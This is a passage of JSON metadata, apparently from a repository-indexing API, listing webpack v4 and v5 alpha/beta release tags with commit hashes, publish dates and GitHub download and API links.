8c3bc8c65fd38e90912fe","kind":"tag","published_at":"2020-04-21T12:06:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15/manifests"},{"name":"v4.42.1","sha":"71eb5931dbd7db125109a95692065333cea936a9","kind":"tag","published_at":"2020-03-24T06:23:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1/manifests"},{"name":"v5.0.0-beta.14","sha":"59f8dc824ec169252476fa5b476e14c95f7bda40","kind":"tag","published_at":"2020-03-02T16:32:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14/manifests"},{"name":"v4.42.0","sha":"29d851bf6d1e5d59eafb688d51396e70d12057c9","kind":"tag","published_at":"2020-03-02T08:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0/manifests"},{"name":"v4.41.6","sha":"71be3bfa45a55aa8ea1b954ab1302565bb073bbc","kind":"tag","published_at":"2020-02-11T10:16:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.6","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.6/manifests"},{"name":"v5.0.0-beta.13","sha":"8445f06fa9abac1c98e6057af1c1fd2de63babbd","kind":"tag","published_at":"2020-01-29T21:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13/manifests"},{"name":"v5.0.0-beta.12","sha":"228c1caaaff0938be2792cd516e5171cc2ce5e49","kind":"tag","published_at":"2020-01-16T00:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12/manifests"},{"name":"v4.41.5","sha":"45ecebc9f0486c43efc7b56f2c31426d94a55264","kind":"tag","published_at":"2019-12-27T21:09:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5/manifests"},{"name":"v5.0.0-beta.11","sha":"3e3b7a2e363dc7746cbde1abbfa188e8aa7f1dea","kind":"tag","published_at":"2019-12-24T07:28:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.11","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11/manifests"},{"name":"v5.0.0-beta.10","sha":"bd21c4d04f15d54f3a8233b742aebdd4b62bb9c2","kind":"tag","published_at":"2019-12-22T00:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.10/manifests"},{"name":"v4.41.4","sha":"dcc45dd977356f08061b2e9451792c6218910891","kind":"tag","published_at":"2019-12-19T07:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4/manifests"},{"name":"v4.41.3","sha":"df9f3eb7d9e4e60e53bfd1595d857bc7f912bc21","kind":"tag","published_at":"2019-12-16T09:33:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3/manifests"},{"name":"v5.0.0-beta.9","sha":"3ae73b62326e12546949e1d21db25b93b064e81b","kind":"tag","published_at":"2019-12-08T21:50:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9/manifests"},{"name":"v5.0.0-beta.8","sha":"9ffda5aee96a6456a2cfe11853d2a0bf5118c7cb","kind":"tag","published_at":"2019-12-08T21:44:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8/manifests"},{"name":"v5.0.0-beta.7","sha":"697ebe81e13681093e9e643986e5011e0aa3a398","kind":"tag","published_at":"2019-11-20T21:51:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.7/manifests"},{"name":"v5.0.0-beta.6","sha":"de1e11b0b5209440a2992eb4ed7dd2ec30391c8f","kind":"tag","published_at":"2019-11-14T21:54:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6/manifests"},{"name":"v5.0.0-beta.5","sha":"85145cebf3ed50014b36e76047681bbb066bbe1f","kind":"tag","published_at":"2019-11-13T13:32:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5/manifests"},{"name":"v5.0.0-beta.4","sha":"f6f5364ad18fcf1b5a33e66d3350d6809ddb03e4","kind":"tag","published_at":"2019-11-12T18:09:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4/manifests"},{"name":"v5.0.0-beta.3","sha":"43afd3d8ee53eb31a61ac78d4bfe067cd63a7fab","kind":"tag","published_at":"2019-11-06T00:09:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3/manifests"},{"name":"v5.0.0-beta.2","sha":"b3e42f3d67df70d5d7cadb47efa2078b97a01ab8","kind":"tag","published_at":"2019-10-31T07:10:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.2/manifests"},{"name":"v5.0.0-beta.1","sha":"4940cb1536967ecfafb4267b2e912ef376481896","kind":"tag","published_at":"2019-10-22T15:56:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1/manifests"},{"name":"v4.41.2","sha":"11e94dd2d0a8d8baae75e715ff8a69f27a9e3014","kind":"tag","published_at":"2019-10-15T13:01:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2/manifests"},{"name":"v5.0.0-beta.0","sha":"1bd85218c0e5adc54f381a63e4187e5fe435a81f","kind":"tag","published_at":"2019-10-11T12:58:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0/manifests"},{"name":"v5.0.0-alpha.32","sha":"8a73bc411b470f5d211053c99efbc1569d630f1b","kind":"tag","published_at":"2019-10-11T12:55:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.32/manifests"},{"name":"v4.41.1","sha":"dcfda0061cef24d68312216893da0b38f4a670f9","kind":"tag","published_at":"2019-10-11T11:42:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1/manifests"},{"name":"v5.0.0-alpha.31","sha":"2bebf88509441835b71af9904e574ea6303642b7","kind":"tag","published_at":"2019-10-10T20:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.31","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31/manifests"},{"name":"v5.0.0-alpha.30","sha":"05a01f3c281fec762c392ae1516ab32cc564859d","kind":"tag","published_at":"2019-10-07T14:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30/manifests"},{"name":"v5.0.0-alpha.29","sha":"6709efb409383aae3c7821c1eea85de107f777b7","kind":"tag","published_at":"2019-10-02T06:01:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29/manifests"},{"name":"v5.0.0-alpha.28","sha":"5aeef4793592113fe354a2f7f4a56dcb2c253dbe","kind":"tag","published_at":"2019-09-26T21:04:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28/manifests"},{"name":"v5.0.0-alpha.27","sha":"b9ffbbaec3f6f5da2cab010baa928bbc545db918","kind":"tag","published_at":"2019-09-25T22:48:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.27","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27/manifests"},{"name":"v4.41.0","sha":"36e318b75c62f4f4a95597e75ecf09d92069f3c4","kind":"tag","published_at":"2019-09-24T15:45:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.0/manifests"},{"name":"v4.40.3","sha":"b58560cf5cafdfe47a3ac3424a3d6ee95954759b","kind":"tag","published_at":"2019-09-24T15:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.3/manifests"},{"name":"v4.40.2","sha":"d1fffd8bbeb024d1452a7f7a33a4c0c87604d8ec","kind":"tag","published_at":"2019-09-13T14:29:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.2/manifests"},{"name":"v4.40.1","sha":"e4c7d8c0ae0c93306f07920bc28fe72119bc098a","kind":"tag","published_at":"2019-09-13T07:07:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1/manifests"},{"name":"v4.40.0","sha":"9c6b36787fe43581d6c568e64b71656274c04881","kind":"tag","published_at":"2019-09-12T18:52:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0/manifests"},{"name":"v5.0.0-alpha.26","sha":"77ef20c1e3e57149053588785f69a69a41f542fc","kind":"tag","published_at":"2019-09-08T20:58:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26/manifests"},{"name":"v5.0.0-alpha.25","sha":"332a14596af7a5792b7b041aeb0cd7544a509c37","kind":"tag","published_at":"2019-09-06T13:37:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25/manifests"},{"name":"v5.0.0-alpha.24","sha":"7c7c96d18c410f6cd4bf15db26650309661c75ea","kind":"tag","published_at":"2019-09-05T12:13:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.24","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24/manifests"},{"name":"v5.0.0-alpha.23","sha":"4a88ea6de08677d4538201605408b42bdaa9c8c7","kind":"tag","published_at":"2019-08-27T17:17:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23/manifests"},{"name":"v4.39.3","sha":"94929a59a79bc79cab789804d5592c3ec0605cc4","kind":"tag","published_at":"2019-08-27T12:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3/manifests"},{"name":"v5.0.0-alpha.22","sha":"4bd900e790611f32431d46ec4af559bc90d267ff","kind":"tag","published_at":"2019-08-23T13:16:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22/manifests"},{"name":"v5.0.0-alpha.21","sha":"2a7f242968c2597fb9b955645fe7f4b57b61d62e","kind":"tag","published_at":"2019-08-22T19:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21/manifests"},{"name":"v5.0.0-alpha.20","sha":"8e1ea8385d10c13c15c79eb9c4146e071ef8d565","kind":"tag","published_at":"2019-08-14T08:21:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20/manifests"},{"name":"v4.39.2","sha":"7265427acf9cd4f0f36f05c1ba16a0abedb7bbc1","kind":"tag","published_at":"2019-08-13T17:45:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.2/manifests"},{"name":"v5.0.0-alpha.19","sha":"1aefa1116b7d54e445e606aa4cffb3a4ec82cd7a","kind":"tag","published_at":"2019-08-06T14:37:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha